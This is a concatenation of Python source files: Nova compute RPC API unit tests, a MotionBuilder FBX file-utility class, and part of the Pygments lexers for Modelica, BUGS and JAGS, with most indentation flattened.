def test_live_migration(self):
self._test_compute_api('live_migration', 'cast',
instance=self.fake_instance_obj, dest='dest',
block_migration='blockity_block', host='tsoh',
migrate_data={}, version='3.26')
def test_post_live_migration_at_destination(self):
self._test_compute_api('post_live_migration_at_destination', 'cast',
instance=self.fake_instance_obj,
block_migration='block_migration', host='host', version='3.14')
def test_pause_instance(self):
self._test_compute_api('pause_instance', 'cast',
instance=self.fake_instance_obj)
def test_soft_delete_instance(self):
self._test_compute_api('soft_delete_instance', 'cast',
instance=self.fake_instance_obj,
reservations=['uuid1', 'uuid2'])
def test_swap_volume(self):
self._test_compute_api('swap_volume', 'cast',
instance=self.fake_instance_obj, old_volume_id='oldid',
new_volume_id='newid')
def test_restore_instance(self):
self._test_compute_api('restore_instance', 'cast',
instance=self.fake_instance_obj, version='3.20')
def test_pre_live_migration(self):
self._test_compute_api('pre_live_migration', 'call',
instance=self.fake_instance_obj,
block_migration='block_migration', disk='disk', host='host',
migrate_data=None, version='3.19')
def test_prep_resize(self):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('prep_resize', 'cast',
instance=self.fake_instance_obj, instance_type='fake_type',
image='fake_image', host='host',
reservations=list('fake_res'),
request_spec='fake_spec',
filter_properties={'fakeprop': 'fakeval'},
node='node', version='3.0')
self.flags(compute='3.38', group='upgrade_levels')
self._test_compute_api('prep_resize', 'cast',
instance=self.fake_instance_obj, instance_type='fake_type',
image='fake_image', host='host',
reservations=list('fake_res'),
request_spec='fake_spec',
filter_properties={'fakeprop': 'fakeval'},
node='node', clean_shutdown=True, version='3.38')
def test_reboot_instance(self):
self.maxDiff = None
self._test_compute_api('reboot_instance', 'cast',
instance=self.fake_instance_obj,
block_device_info={},
reboot_type='type')
def test_rebuild_instance(self):
self._test_compute_api('rebuild_instance', 'cast', new_pass='None',
injected_files='None', image_ref='None', orig_image_ref='None',
bdms=[], instance=self.fake_instance_obj, host='new_host',
orig_sys_metadata=None, recreate=True, on_shared_storage=True,
preserve_ephemeral=True, version='3.21')
def test_reserve_block_device_name(self):
self._test_compute_api('reserve_block_device_name', 'call',
instance=self.fake_instance_obj, device='device',
volume_id='id', disk_bus='ide', device_type='cdrom',
version='3.35', return_bdm_object=True)
def test_refresh_provider_fw_rules(self):
self._test_compute_api('refresh_provider_fw_rules', 'cast',
host='host')
def test_refresh_security_group_rules(self):
self._test_compute_api('refresh_security_group_rules', 'cast',
rpcapi_class=compute_rpcapi.SecurityGroupAPI,
security_group_id='id', host='host')
def test_refresh_security_group_members(self):
self._test_compute_api('refresh_security_group_members', 'cast',
rpcapi_class=compute_rpcapi.SecurityGroupAPI,
security_group_id='id', host='host')
def test_remove_aggregate_host(self):
self._test_compute_api('remove_aggregate_host', 'cast',
aggregate={'id': 'fake_id'}, host_param='host', host='host',
slave_info={})
def test_remove_fixed_ip_from_instance(self):
self._test_compute_api('remove_fixed_ip_from_instance', 'cast',
instance=self.fake_instance_obj, address='addr',
version='3.13')
def test_remove_volume_connection(self):
self._test_compute_api('remove_volume_connection', 'call',
instance=self.fake_instance, volume_id='id', host='host',
version='3.30')
def test_rescue_instance(self):
self.flags(compute='3.9', group='upgrade_levels')
self._test_compute_api('rescue_instance', 'cast',
instance=self.fake_instance_obj, rescue_password='pw',
version='3.9')
self.flags(compute='3.24', group='upgrade_levels')
self._test_compute_api('rescue_instance', 'cast',
instance=self.fake_instance_obj, rescue_password='pw',
rescue_image_ref='fake_image_ref', version='3.24')
self.flags(compute='3.37', group='upgrade_levels')
self._test_compute_api('rescue_instance', 'cast',
instance=self.fake_instance_obj, rescue_password='pw',
rescue_image_ref='fake_image_ref',
clean_shutdown=True, version='3.37')
def test_reset_network(self):
self._test_compute_api('reset_network', 'cast',
instance=self.fake_instance_obj)
def test_resize_instance(self):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('resize_instance', 'cast',
instance=self.fake_instance_obj, migration={'id': 'fake_id'},
image='image', instance_type={'id': 1},
reservations=list('fake_res'), version='3.0')
self.flags(compute='3.37', group='upgrade_levels')
self._test_compute_api('resize_instance', 'cast',
instance=self.fake_instance_obj, migration={'id': 'fake_id'},
image='image', instance_type={'id': 1},
reservations=list('fake_res'),
clean_shutdown=True, version='3.37')
def test_resume_instance(self):
self._test_compute_api('resume_instance', 'cast',
instance=self.fake_instance_obj)
def test_revert_resize(self):
self._test_compute_api('revert_resize', 'cast',
instance=self.fake_instance_obj, migration={'id': 'fake_id'},
host='host', reservations=list('fake_res'))
@mock.patch('nova.compute.rpcapi.ComputeAPI._warn_buggy_live_migrations')
def test_rollback_live_migration_at_destination(self, mock_warn):
self._test_compute_api('rollback_live_migration_at_destination',
'cast', instance=self.fake_instance_obj, host='host',
destroy_disks=True, migrate_data=None, version='3.32')
self.assertFalse(mock_warn.called)
@mock.patch('nova.compute.rpcapi.ComputeAPI._warn_buggy_live_migrations')
def test_rollback_live_migration_at_destination_old_warning(self,
mock_warn):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('rollback_live_migration_at_destination',
'cast', instance=self.fake_instance_obj, host='host',
version='3.0')
mock_warn.assert_called_once_with(None)
def test_run_instance(self):
self._test_compute_api('run_instance', 'cast',
instance=self.fake_instance_obj, host='fake_host',
request_spec='fake_spec', filter_properties={},
requested_networks='networks', injected_files='files',
admin_password='pw', is_first_time=True, node='node',
legacy_bdm_in_spec=False, version='3.27')
def test_set_admin_password(self):
self._test_compute_api('set_admin_password', 'call',
instance=self.fake_instance_obj, new_pass='pw',
version='3.8')
def test_set_host_enabled(self):
self._test_compute_api('set_host_enabled', 'call',
enabled='enabled', host='host')
def test_get_host_uptime(self):
self._test_compute_api('get_host_uptime', 'call', host='host')
def test_backup_instance(self):
self._test_compute_api('backup_instance', 'cast',
instance=self.fake_instance_obj, image_id='id',
backup_type='type', rotation='rotation')
def test_snapshot_instance(self):
self._test_compute_api('snapshot_instance', 'cast',
instance=self.fake_instance_obj, image_id='id')
def test_start_instance(self):
self._test_compute_api('start_instance', 'cast',
instance=self.fake_instance_obj)
def test_stop_instance_cast(self):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('stop_instance', 'cast',
instance=self.fake_instance_obj, version='3.0')
self.flags(compute='3.37', group='upgrade_levels')
self._test_compute_api('stop_instance', 'cast',
instance=self.fake_instance_obj,
clean_shutdown=True, version='3.37')
def test_stop_instance_call(self):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('stop_instance', 'call',
instance=self.fake_instance_obj, version='3.0')
self.flags(compute='3.37', group='upgrade_levels')
self._test_compute_api('stop_instance', 'call',
instance=self.fake_instance_obj,
clean_shutdown=True, version='3.37')
def test_suspend_instance(self):
self._test_compute_api('suspend_instance', 'cast',
instance=self.fake_instance_obj)
def test_terminate_instance(self):
self._test_compute_api('terminate_instance', 'cast',
instance=self.fake_instance_obj, bdms=[],
reservations=['uuid1', 'uuid2'], version='3.22')
def test_unpause_instance(self):
self._test_compute_api('unpause_instance', 'cast',
instance=self.fake_instance_obj)
def test_unrescue_instance(self):
self._test_compute_api('unrescue_instance', 'cast',
instance=self.fake_instance_obj, version='3.11')
def test_shelve_instance(self):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('shelve_instance', 'cast',
instance=self.fake_instance_obj, image_id='image_id',
version='3.0')
self.flags(compute='3.37', group='upgrade_levels')
self._test_compute_api('shelve_instance', 'cast',
instance=self.fake_instance_obj, image_id='image_id',
clean_shutdown=True, version='3.37')
def test_shelve_offload_instance(self):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('shelve_offload_instance', 'cast',
instance=self.fake_instance_obj,
version='3.0')
self.flags(compute='3.37', group='upgrade_levels')
self._test_compute_api('shelve_offload_instance', 'cast',
instance=self.fake_instance_obj,
clean_shutdown=True, version='3.37')
def test_unshelve_instance(self):
self._test_compute_api('unshelve_instance', 'cast',
instance=self.fake_instance_obj, host='host', image='image',
filter_properties={'fakeprop': 'fakeval'}, node='node',
version='3.15')
def test_volume_snapshot_create(self):
self._test_compute_api('volume_snapshot_create', 'cast',
instance=self.fake_instance_obj, volume_id='fake_id',
create_info={}, version='3.6')
def test_volume_snapshot_delete(self):
self._test_compute_api('volume_snapshot_delete', 'cast',
instance=self.fake_instance_obj, volume_id='fake_id',
snapshot_id='fake_id2', delete_info={}, version='3.6')
def test_external_instance_event(self):
self._test_compute_api('external_instance_event', 'cast',
instances=[self.fake_instance_obj],
events=['event'],
version='3.23')
def test_build_and_run_instance(self):
self._test_compute_api('build_and_run_instance', 'cast',
instance=self.fake_instance_obj, host='host', image='image',
request_spec={'request': 'spec'}, filter_properties=[],
admin_password='passwd', injected_files=None,
requested_networks=['network1'], security_groups=None,
block_device_mapping=None, node='node', limits=[],
version='3.40')
@mock.patch('nova.utils.is_neutron', return_value=True)
def test_build_and_run_instance_icehouse_compat(self, is_neutron):
self.flags(compute='icehouse', group='upgrade_levels')
self._test_compute_api('build_and_run_instance', 'cast',
instance=self.fake_instance_obj, host='host', image='image',
request_spec={'request': 'spec'}, filter_properties=[],
admin_password='passwd', injected_files=None,
requested_networks=objects_network_request.NetworkRequestList(
objects=[objects_network_request.NetworkRequest(
network_id="fake_network_id", address="10.0.0.1",
port_id="fake_port_id")]),
security_groups=None,
block_device_mapping=None, node='node', limits={},
version='3.23')
@mock.patch('nova.utils.is_neutron', return_value=False)
def test_build_and_run_instance_icehouse_compat_nova_net(self, is_neutron):
self.flags(compute='icehouse', group='upgrade_levels')
self._test_compute_api('build_and_run_instance', 'cast',
instance=self.fake_instance_obj, host='host', image='image',
request_spec={'request': 'spec'}, filter_properties=[],
admin_password='passwd', injected_files=None,
requested_networks=objects_network_request.NetworkRequestList(
objects=[objects_network_request.NetworkRequest(
network_id='fake_network_id', address='10.0.0.1')]),
security_groups=None,
block_device_mapping=None, node='node', limits={},
version='3.23', nova_network=True)
def test_quiesce_instance(self):
self._test_compute_api('quiesce_instance', 'call',
instance=self.fake_instance_obj, version='3.39')
def test_unquiesce_instance(self):
self._test_compute_api('unquiesce_instance', 'cast',
instance=self.fake_instance_obj, mapping=None, version='3.39')
@mock.patch('nova.utils.is_neutron', return_value=True)
def test_build_and_run_instance_juno_compat(self, is_neutron):
self.flags(compute='juno', group='upgrade_levels')
self._test_compute_api('build_and_run_instance', 'cast',
instance=self.fake_instance_obj, host='host', image='image',
request_spec={'request': 'spec'}, filter_properties=[],
admin_password='passwd', injected_files=None,
requested_networks=objects_network_request.NetworkRequestList(
objects=[objects_network_request.NetworkRequest(
network_id="fake_network_id", address="10.0.0.1",
port_id="fake_port_id")]),
security_groups=None,
block_device_mapping=None, node='node', limits={},
version='3.33')
@mock.patch('nova.objects.ComputeNode.get_by_host_and_nodename')
@mock.patch('nova.utils.is_neutron', return_value=True)
def test_build_and_run_instance_limits_juno_compat(
self, is_neutron, get_by_host_and_nodename):
host_topology = objects_numa.NUMATopology(cells=[
objects_numa.NUMACell(
id=0, cpuset=set([1, 2]), memory=512,
cpu_usage=2, memory_usage=256,
pinned_cpus=set([1])),
objects_numa.NUMACell(
id=1, cpuset=set([3, 4]), memory=512,
cpu_usage=1, memory_usage=128,
pinned_cpus=set([]))
])
limits = objects_numa.NUMATopologyLimits(
cpu_allocation_ratio=16,
ram_allocation_ratio=2)
cnode = objects_compute_node.ComputeNode(
numa_topology=jsonutils.dumps(
host_topology.obj_to_primitive()))
get_by_host_and_nodename.return_value = cnode
legacy_limits = jsonutils.dumps(
limits.to_dict_legacy(host_topology))
self.flags(compute='juno', group='upgrade_levels')
netreqs = objects_network_request.NetworkRequestList(objects=[
objects_network_request.NetworkRequest(
network_id="fake_network_id",
address="10.0.0.1",
port_id="fake_port_id")])
self._test_compute_api('build_and_run_instance', 'cast',
instance=self.fake_instance_obj,
host='host',
image='image',
request_spec={'request': 'spec'},
filter_properties=[],
admin_password='passwd',
injected_files=None,
requested_networks=netreqs,
security_groups=None,
block_device_mapping=None,
node='node',
limits={'numa_topology': limits},
legacy_limits={'numa_topology': legacy_limits},
version='3.33')
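# A distilled, self-contained sketch of the pattern _test_compute_api builds
# on: patch the transport method on the client, call through the API, then
# assert on the exact RPC that was recorded. FakeClient and FakeAPI are
# hypothetical stand-ins for the real oslo.messaging client and ComputeAPI.
if __name__ == '__main__':
    class FakeClient(object):
        def cast(self, ctxt, method, **kwargs):
            pass

    class FakeAPI(object):
        def __init__(self):
            self.client = FakeClient()

        def pause_instance(self, ctxt, instance):
            self.client.cast(ctxt, 'pause_instance', instance=instance)

    api = FakeAPI()
    with mock.patch.object(api.client, 'cast') as cast_mock:
        api.pause_instance('fake-ctxt', instance={'uuid': 'fake'})
        cast_mock.assert_called_once_with('fake-ctxt', 'pause_instance',
                                          instance={'uuid': 'fake'})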
|
|
'''
Author: Jason.Parks
Created: April 25, 2012
Module: core.moBuFile
Purpose: File convenience class
'''
from pyfbsdk import *
from common.core import globalVariables as gv
from common.diagnostic.pcsLogger import moBuLogger
from common.fileIO.parser_schema import ParseSchema
from common.fileIO.pcsPath import Path
from moBu.core.moBuCore import MoBuCore #@UnresolvedImport
#import P4
import getpass
import os
import re
import shutil
schemaObj = ParseSchema(mobu=1)
# eclipseSyntax
if False: from pyfbsdk_gen_doc import * #@UndefinedVariable @UnusedWildImport
class MoBuFile(MoBuCore):
def __init__(self):
""" MoBuFile.__init__(): set initial parameters """
super(MoBuFile, self).__init__()
def cleanDirs(self, folderPath='', dirExtension='.fbm'):
''' Cleans viral .bck/.fbm folders from given folderPath
Params:
folderPath: directory to clean
dirExtension: extension to look for on end of dir
Returns: True if cleaned any
'''
deleted = False
if not folderPath:
moBuLogger.error("No folderPath arg passed.")
return False
for root, dirs, unused in os.walk(folderPath):
for _dir in dirs:
dirPath = os.path.join(root, _dir)
if Path(dirPath).isdir:
if re.search(dirExtension, dirPath):
try:
shutil.rmtree(dirPath)
deleted = True
except WindowsError:
moBuLogger.info("Failed to remove '%s'" % dirPath)
return deleted
def customFBFbxOptions(self, pLoad=False, saveAllTakes=True, allElements=True, selection=False, **kwargs):
''' create save/load options
Params:
pLoad: True if loading, False if saving
saveAllTakes: Set to False if save current take only
allElements: Set to False and pass kwargs to save/load/merge specific elements
selection: True to save selected only
Returns: FBFbxOptions object
'''
if self.mobuVer == 2010:
moBuLogger.warning("FBFbxOptions are not valid for 2010")
return None
elif self.mobuVer == 2012 or self.mobuVer == 2013 or self.mobuVer == 2014:
# create object
pFbxOptions = FBFbxOptions(pLoad)
if not allElements:
# set all ElementActions and Base properties to false
pFbxOptions.SetAll(FBElementAction.kFBElementActionDiscard, False)
baseProperties = ['BaseCameras',
'CameraSwitcher', 'CameraSwitcherSettings',
'CurrentCamera', 'CurrentCameraSettings',
'GlobalLighting', 'GlobalLightingSettings',
'Transport', 'TransportSettings',
'EmbedMedia', 'SaveSelectedModelsOnly', ]
for bProperty in baseProperties:
setattr(pFbxOptions, bProperty, False)
# process kwargs
for key in kwargs:
# check for non-strings passed in; skip them so the string tests
# below cannot raise TypeError
if not isinstance(kwargs[key], str):
moBuLogger.error("A non-string type arg was passed in: '%s'" % kwargs[key])
continue
if 'kFBElementAction' in kwargs[key]:
# FBPropertyElementAction: look the action up on the FBElementAction enum
setattr(pFbxOptions, key, getattr(FBElementAction, kwargs[key]))
else:
# FBPropertyBase: the value arrives as a string such as 'True'
setattr(pFbxOptions, key, eval(kwargs[key]))
# save selected for saves
if not pLoad and selection:
pFbxOptions.SaveSelectedModelsOnly = True
# skip takes
if not saveAllTakes:
currentTake = self.system.CurrentTake
pTakeIndex = 0
for take in self.scene.Takes:
# save current take only
if not pLoad:
if not take.Name == currentTake.Name:
pFbxOptions.SetTakeSelect(pTakeIndex, False)
# merge no takes
else:
pFbxOptions.SetTakeSelect(pTakeIndex, False)
pTakeIndex += 1
# save ASCII
pFbxOptions.UseASCIIFormat = True
return pFbxOptions
else:
moBuLogger.error("Wrong version of MotionBuilder '%s'" % self.mobuVer)
def fixThis(self, message=''):
''' sends scene and email to T.A.
Params:
message: passed message for email
Returns: True/False
'''
successes = 0
#1. Note currentScene name for reload
currentScene = self.sceneName
#2. Enter notes
if not message:
result = FBMessageBoxGetUserValue("Send Message", "Can you tell me what you were doing?", "Nothing to say", FBPopupInputType.kFBPopupString, "Send scene", "Cancel")
if result[0] == 1:
message = result[1]
elif result[0] == 2:
moBuLogger.info("Cancelled mbCore.fixThis()")
return False
#3. Save to network location
savePath = Path('%s/data/%s/fixThis' % (gv.schemaLocation, getpass.getuser()))
saveFilePath = '%s/%s' % (savePath, Path(currentScene).basename())
# make dir
if not os.path.exists(savePath):
os.makedirs(savePath)
if self.savePCSoptions(pathFile=saveFilePath, quiet=True, pOptions=None, p4=False):
moBuLogger.info("Saved scene to: '%s'" % saveFilePath)
successes += 1
else:
moBuLogger.info("Failed to save scene to: '%s'" % saveFilePath)
return False
#4. Email TechArtist
#TODO: email message
_file = open(saveFilePath.replace('.fbx', '.txt'), "w")
_file.write(message)
_file.close()
#5. Reload original scene
if self.loadPCSoptions(pathFile=currentScene, quiet=False, pOptions=None):
successes += 1
else:
moBuLogger.info("Failed to reload original scene: '%s'" % currentScene)
if successes == 2:
return True
else:
return False
def loadPCSoptions(self, pathFile=None, quiet=False, pOptions=None):
''' loads with customFBFbxOptions
Params:
pathFile: complete file path to open
quiet: suppress messages
pOptions: pre-made options
Returns: True/False
'''
# pick file if not passed
if not pathFile:
pathFile = self.openFileDialog(openSave='open')
# # Check for binary
# lFbp = FBProgress()
# lFbp.ProgressBegin()
# lFbp.Caption = "Checking binary on %s" % pathFile.basename
# lFbp.Percent = 50
# if Path(pathFile).isbin:
# moBuLogger.warning("Skipping file '%s' because detected binary" % pathFile)
# lFbp.ProgressDone()
# return False
# moBuLogger.debug("Checked '%s' for binary, passed." % pathFile)
#
# lFbp.ProgressDone()
# check for cancel
if not pathFile:
moBuLogger.info("Cancelled open via loadPCSoptions()")
return False
if not pOptions:
pOptions = self.customFBFbxOptions(pLoad=True)
# by default, load all takes; honor a caller-supplied pOptions rather
# than rebuilding the options here
success = self.app.FileOpen(str(pathFile), 1 - quiet, pOptions)
if success:
moBuLogger.info("Success opening '%s'" % pathFile)
else:
moBuLogger.error("Failed to open '%s'" % pathFile)
# # check for hips
# ref = self.getObject("Reference")
# if ref:
# if len(ref.Children) > 0:
# if not ref.Children[0].Name == 'Hips':
# moBuLogger.infoDialog("WARNING: No Hips found in scene. Check your joint names.", "Joints Missing")
return success
def mergePCSoptions(self, pathFile='', quiet=True, pOptions=None):
''' merges with customFBFbxOptions
Params:
pathFile: complete file path to merge
quiet: suppress messages
pOptions: pre-made options
Returns: True/False
'''
if not pathFile:
pathFile = self.openFileDialog()
if not pOptions:
pOptions = self.customFBFbxOptions(pLoad=True, saveAllTakes=True, allElements=True)
# by default, do NOT merge takes
if self.app.FileMerge(str(pathFile), 1 - quiet, pOptions):
# report
if not quiet:
moBuLogger.info("Merged %s with PCSoptions" % pathFile)
return True
else:
moBuLogger.error("Failed to merge '%s'" % pathFile)
return False
def openFileDialog(self, openSave='open', startPath=''):
''' opens dialog box to select a file
Params:
openSave: open or save file type
startPath: start in path
Returns: path and fileName/False
'''
lFp = FBFilePopup()
lFp.Caption = "Select a file"
if openSave == 'open':
lFp.Style = FBFilePopupStyle.kFBFilePopupOpen
elif openSave == 'save':
lFp.Style = FBFilePopupStyle.kFBFilePopupSave
else:
moBuLogger.error("Illegal arg passed. openSave=%s" % openSave)
# BUG: If we do not set the filter, we will have an exception.
lFp.Filter = "*"
if not startPath:
if not self.sceneName == 'Untitled':
lFp.Path = str(self.sceneName.parent)
else:
lFp.Path = str(schemaObj.artRoot.replace('/', "\\"))
else:
lFp.Path = str(Path(startPath).makePretty(lastSlash=False, backward=True))
# open window
lRes = lFp.Execute()
if lRes:
return lFp.FullFilename
else:
return False
def openFolderDialog(self):
''' opens dialog box to select a folder
Params: none
Returns: path to folder/False
'''
lFp = FBFolderPopup()
lFp.Caption = "Select a folder"
self.app = FBApplication()
if not self.sceneName == 'Untitled':
lFp.Path = str(self.sceneName.parent)
else:
lFp.Path = str(schemaObj.artRoot)
lRes = lFp.Execute()
if lRes:
return lFp.Path
else:
return False
def savePCSoptions(self, pathFile=None, quiet=True, pOptions=None, p4=True):
''' saves with customFBFbxOptions
Params:
pathFile: complete file path to save
quiet: suppress messages
pOptions: pre-made options
p4: markForAdd/checkout or not
Returns: True/False
'''
text = 'Saved with PCSoptions'
# pick file if not passed
if not pathFile:
if not quiet:
pathFile = self.openFileDialog(openSave='save')
else:
moBuLogger.error("No pathFile passed and quiet=True")
return False
if not pathFile:
moBuLogger.info("Cancelled")
return False
# add extension if they didn't type it
if not Path(pathFile).ext:
pathFile = '%s.fbx' % pathFile
# # checkout from perforce
# if p4:
# if self.pcsParseObj.isp4Active:
# self.p4.fileName = pathFile
# if self.p4.isP4Connected:
# try:
# self.p4.p4CheckOut(desc=text)
## except P4.P4Exception:
# except:
# moBuLogger.warning("Failed to checkout: '%s'" % pathFile)
# else:
# if not quiet:
# moBuLogger.warning('P4Active setting FALSE, not checking out.')
# else:
# if not quiet:
# moBuLogger.warning("p4 arg passed as False, not checking out for file: '%s'." % pathFile)
if not pOptions:
pOptions = self.customFBFbxOptions(pLoad=False, saveAllTakes=True)
# 2010 save process
currentTakeObject = FBSystem().CurrentTake
if self.mobuVer == 2010:
lMgr = FBFbxManager() #@UndefinedVariable
lMgr.SaveBegin(str(pathFile))
lMgr.Selected = True
for strEach in lMgr.Takes:
if strEach.Name != currentTakeObject.Name:
strEach.Import = False
lMgr.EmbedMedia = False
lMgr.BaseCameras = False
lMgr.CameraSwitcherSettings = False
lMgr.CurrentCameraSettings = False
lMgr.GlobalLightingSettings = False
lMgr.TransportSettings = False
if not lMgr.Save():
moBuLogger.errorDialog('There is a problem saving the file', 'Cannot Save')
if not lMgr.SaveEnd():
moBuLogger.errorDialog('There is a problem saving the file', 'Cannot Save')
# 2012 save process
elif self.mobuVer == 2012 or self.mobuVer == 2013 or self.mobuVer == 2014:
alreadyExists = False
if Path(pathFile).exists():
alreadyExists = True
if not self.app.FileSave(str(pathFile), pOptions):
# cancelled?
moBuLogger.warning("Cancelled")
return False
if not alreadyExists:
# check to see if new file is there
res = os.path.exists(str(pathFile))
if res:
if not quiet:
moBuLogger.info("%s, '%s'" % (text, str(pathFile)))
return True
else:
moBuLogger.errorDialog("Failed to save '%s'" % str(pathFile))
return False
else:
#TODO: check to see if different?
if not quiet:
moBuLogger.info("%s, '%s'" % (text, str(pathFile)))
return True
mbFile = MoBuFile()
print "core.moBuFile imported"
|
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.modeling
~~~~~~~~~~~~~~~~~~~~~~~~
Lexers for modeling languages.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, include, bygroups, using, default
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation
from pygments.lexers.html import HtmlLexer
from pygments.lexers import _stan_builtins
__all__ = ['ModelicaLexer', 'BugsLexer', 'JagsLexer', 'StanLexer']
class ModelicaLexer(RegexLexer):
"""
For `Modelica <http://www.modelica.org/>`_ source code.
.. versionadded:: 1.1
"""
name = 'Modelica'
aliases = ['modelica']
filenames = ['*.mo']
mimetypes = ['text/x-modelica']
flags = re.DOTALL | re.MULTILINE
_name = r"(?:'(?:[^\\']|\\.)+'|[a-zA-Z_]\w*)"
tokens = {
'whitespace': [
(u'[\\s\ufeff]+', Text),
(r'//[^\n]*\n?', Comment.Single),
(r'/\*.*?\*/', Comment.Multiline)
],
'root': [
include('whitespace'),
(r'"', String.Double, 'string'),
(r'[()\[\]{},;]+', Punctuation),
(r'\.?[*^/+-]|\.|<>|[<>:=]=?', Operator),
(r'\d+(\.?\d*[eE][-+]?\d+|\.\d*)', Number.Float),
(r'\d+', Number.Integer),
(r'(abs|acos|actualStream|array|asin|assert|AssertionLevel|atan|'
r'atan2|backSample|Boolean|cardinality|cat|ceil|change|Clock|'
r'Connections|cos|cosh|cross|delay|diagonal|div|edge|exp|'
r'ExternalObject|fill|floor|getInstanceName|hold|homotopy|'
r'identity|inStream|integer|Integer|interval|inverse|isPresent|'
r'linspace|log|log10|matrix|max|min|mod|ndims|noClock|noEvent|'
r'ones|outerProduct|pre|previous|product|Real|reinit|rem|rooted|'
r'sample|scalar|semiLinear|shiftSample|sign|sin|sinh|size|skew|'
r'smooth|spatialDistribution|sqrt|StateSelect|String|subSample|'
r'sum|superSample|symmetric|tan|tanh|terminal|terminate|time|'
r'transpose|vector|zeros)\b', Name.Builtin),
(r'(algorithm|annotation|break|connect|constant|constrainedby|der|'
r'discrete|each|else|elseif|elsewhen|encapsulated|enumeration|'
r'equation|exit|expandable|extends|external|final|flow|for|if|'
r'import|impure|in|initial|inner|input|loop|nondiscrete|outer|'
r'output|parameter|partial|protected|public|pure|redeclare|'
r'replaceable|return|stream|then|when|while)\b',
Keyword.Reserved),
(r'(and|not|or)\b', Operator.Word),
(r'(block|class|connector|end|function|model|operator|package|'
r'record|type)\b', Keyword.Reserved, 'class'),
(r'(false|true)\b', Keyword.Constant),
(r'within\b', Keyword.Reserved, 'package-prefix'),
(_name, Name)
],
'class': [
include('whitespace'),
(r'(function|record)\b', Keyword.Reserved),
(r'(if|for|when|while)\b', Keyword.Reserved, '#pop'),
(_name, Name.Class, '#pop'),
default('#pop')
],
'package-prefix': [
include('whitespace'),
(_name, Name.Namespace, '#pop'),
default('#pop')
],
'string': [
(r'"', String.Double, '#pop'),
(r'\\[\'"?\\abfnrtv]', String.Escape),
(r'(?i)<\s*html\s*>([^\\"]|\\.)+?(<\s*/\s*html\s*>|(?="))',
using(HtmlLexer)),
(r'<|\\?[^"\\<]+', String.Double)
]
}
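# Usage sketch (not part of the original module; kept as a comment so that
# importing this file stays side-effect free). `highlight` and
# `TerminalFormatter` are standard pygments entry points:
#
#   from pygments import highlight
#   from pygments.formatters import TerminalFormatter
#
#   code = 'model Gain\n  parameter Real k = 2.0;\nend Gain;'
#   print(highlight(code, ModelicaLexer(), TerminalFormatter()))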
class BugsLexer(RegexLexer):
"""
Pygments Lexer for `OpenBUGS <http://www.openbugs.net/>`_ and WinBUGS
models.
.. versionadded:: 1.6
"""
name = 'BUGS'
aliases = ['bugs', 'winbugs', 'openbugs']
filenames = ['*.bug']
_FUNCTIONS = (
# Scalar functions
'abs', 'arccos', 'arccosh', 'arcsin', 'arcsinh', 'arctan', 'arctanh',
'cloglog', 'cos', 'cosh', 'cumulative', 'cut', 'density', 'deviance',
'equals', 'expr', 'gammap', 'ilogit', 'icloglog', 'integral', 'log',
'logfact', 'loggam', 'logit', 'max', 'min', 'phi', 'post.p.value',
'pow', 'prior.p.value', 'probit', 'replicate.post', 'replicate.prior',
'round', 'sin', 'sinh', 'solution', 'sqrt', 'step', 'tan', 'tanh',
'trunc',
# Vector functions
'inprod', 'interp.lin', 'inverse', 'logdet', 'mean', 'eigen.vals',
'ode', 'prod', 'p.valueM', 'rank', 'ranked', 'replicate.postM',
'sd', 'sort', 'sum',
# Special
'D', 'I', 'F', 'T', 'C')
""" OpenBUGS built-in functions
From http://www.openbugs.info/Manuals/ModelSpecification.html#ContentsAII
This also includes
- T, C, I : Truncation and censoring.
``T`` and ``C`` are in OpenBUGS. ``I`` in WinBUGS.
- D : ODE
- F : Functional http://www.openbugs.info/Examples/Functionals.html
"""
_DISTRIBUTIONS = ('dbern', 'dbin', 'dcat', 'dnegbin', 'dpois',
'dhyper', 'dbeta', 'dchisqr', 'ddexp', 'dexp',
'dflat', 'dgamma', 'dgev', 'df', 'dggamma', 'dgpar',
'dloglik', 'dlnorm', 'dlogis', 'dnorm', 'dpar',
'dt', 'dunif', 'dweib', 'dmulti', 'ddirch', 'dmnorm',
'dmt', 'dwish')
""" OpenBUGS built-in distributions
Functions from
http://www.openbugs.info/Manuals/ModelSpecification.html#ContentsAI
"""
tokens = {
'whitespace': [
(r"\s+", Text),
],
'comments': [
# Comments
(r'#.*$', Comment.Single),
],
'root': [
# Comments
include('comments'),
include('whitespace'),
# Block start
(r'(model)(\s+)(\{)',
bygroups(Keyword.Namespace, Text, Punctuation)),
# Reserved Words
(r'(for|in)(?![\w.])', Keyword.Reserved),
# Built-in Functions
(r'(%s)(?=\s*\()'
% r'|'.join(_FUNCTIONS + _DISTRIBUTIONS),
Name.Builtin),
# Regular variable names
(r'[A-Za-z][\w.]*', Name),
# Number Literals
(r'[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?', Number),
# Punctuation
(r'\[|\]|\(|\)|:|,|;', Punctuation),
# Assignment operators
# SLexer makes these tokens Operators.
(r'<-|~', Operator),
# Infix and prefix operators
(r'\+|-|\*|/', Operator),
# Block
(r'[{}]', Punctuation),
]
}
def analyse_text(text):
if re.search(r"^\s*model\s*{", text, re.M):
return 0.7
else:
return 0.0
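# Usage sketch: `analyse_text` is the hook that lets
# `pygments.lexers.guess_lexer` pick this lexer for unlabelled input.
# A minimal, commented example (guess_lexer is a standard pygments API;
# BUGS should win here because its analyse_text returns 0.7):
#
#   from pygments.lexers import guess_lexer
#
#   model = 'model {\n    y ~ dnorm(mu, tau)\n}'
#   print(guess_lexer(model).name)  # expected: 'BUGS'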
class JagsLexer(RegexLexer):
"""
Pygments Lexer for JAGS.
.. versionadded:: 1.6
"""
name = 'JAGS'
aliases = ['jags']
filenames = ['*.jag', '*.bug']
# JAGS
_FUNCTIONS = (
'abs', 'arccos', 'arccosh', 'arcsin', 'arcsinh', 'arctan', 'arctanh',
'cos', 'cosh', 'cloglog',
'equals', 'exp', 'icloglog', 'ifelse', 'ilogit', 'log', 'logfact',
